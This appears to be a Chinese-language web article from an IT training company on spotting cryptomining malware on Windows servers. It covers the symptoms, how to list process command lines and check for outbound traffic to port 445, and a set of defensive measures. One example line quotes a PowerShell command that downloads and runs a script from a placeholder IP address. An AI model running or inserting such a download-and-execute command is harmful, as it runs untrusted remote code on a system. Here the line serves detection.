Windows 服务器挖矿病毒的判断方法

发布时间:2022-06-30    浏览量:



挖矿病毒的简单表征现象(出现以下现象,即应开始警惕)

  • CPU占用率高

  • C盘可用空间骤降

  • 服务器风扇开始全负载工作,具体现象就是巡检物理服务器的时候明显感觉"噪声变大"



挖矿病毒的工作方式及如何简单排查

新的挖矿病毒已经开始结合高级攻击技术,如利用"EternalBlue 永恒之蓝", Weblogic WLS 组件漏洞、Strusts2 远程命令执行,Jboss 反序列化漏洞等等进入系统;

当病毒通过漏洞进入系统后,通常会使用 cmd 、powershell 命令执行从远端下载"挖矿脚本"(也有部分直接就自带挖矿程序,直接利用漏洞执行)


可以在服务器的 cmd 窗口下执行以下命令查找所有进程,该命令将会把所有进程信息生成到 tasklist.txt 文本文件内,以便分析:

C:\Users\Administrator> wmic process get caption,commandline /value >> tasklist.tx


在文本文件中着重查看 CommandLine= 后面带有 "http" 链接的进程,如:

CommandLine=cmd.exe /c "powershell.exe -nop -c "iex(New-Object Net.WebClient).DownloadString('http://xxx.xxx.xxx.xxx/xxx'


目前新型的勒索/挖矿病毒都会利用 445 端口进行横向传播,具体现象即: 服务器会向大量其他IP地址的445端口发送请求; 可使用 netstat 命令进行检查:

C:\Users\Administrator> netstat -ano | find "SYN"
TCP 192.168.3.91:6735 10.1.1.70:445 SYN_SENT 10864
TCP 192.168.3.91:6736 10.1.1.71:445 SYN_SENT 10864
TCP 192.168.3.91:6745 10.1.1.72:445 SYN_SENT 10864
TCP 192.168.3.91:6746 10.1.1.73:445 SYN_SENT 10864
TCP 192.168.3.91:6755 10.1.1.74:445 SYN_SENT 10864
TCP 192.168.3.91:6756 10.1.1.75:445 SYN_SENT 10864
TCP 192.168.3.91:6765 10.1.1.76:445 SYN_SENT 1086

"进程ID号为 10864 的进程,正在尝试访问 10.11.70-76 这几台主机的 445 端口"




防范手段

1. 巡检机房时,多注意下是否有服务器在空闲时段出现"风扇满载"的现象

2. 对重要业务服务器,部署监控系统,如 zabbix,方便随时查看服务器CPU、磁盘等负载,并且设置阈值告警,触发则提示运维人员

3. 使用组策略中的"IP策略"将 TCP/UDP 的 445,135-139 端口进行封堵(注意: 封堵 445 后,文件共享服务无法使用,域控也无法正常工作; 最佳做法是:打补丁)

4. 服务器可以部署付费的杀毒软件,如 NOD32 企业版、火绒企业版、360企业版等,这些企业版杀毒软件均支持离线更新病毒库


微思网络总部
福建省厦门市思明区金山大厦
查看路线
微思网络集美分部
福建省厦门市集美区集美区浒...
查看路线
定位
点击左侧的按钮进行定位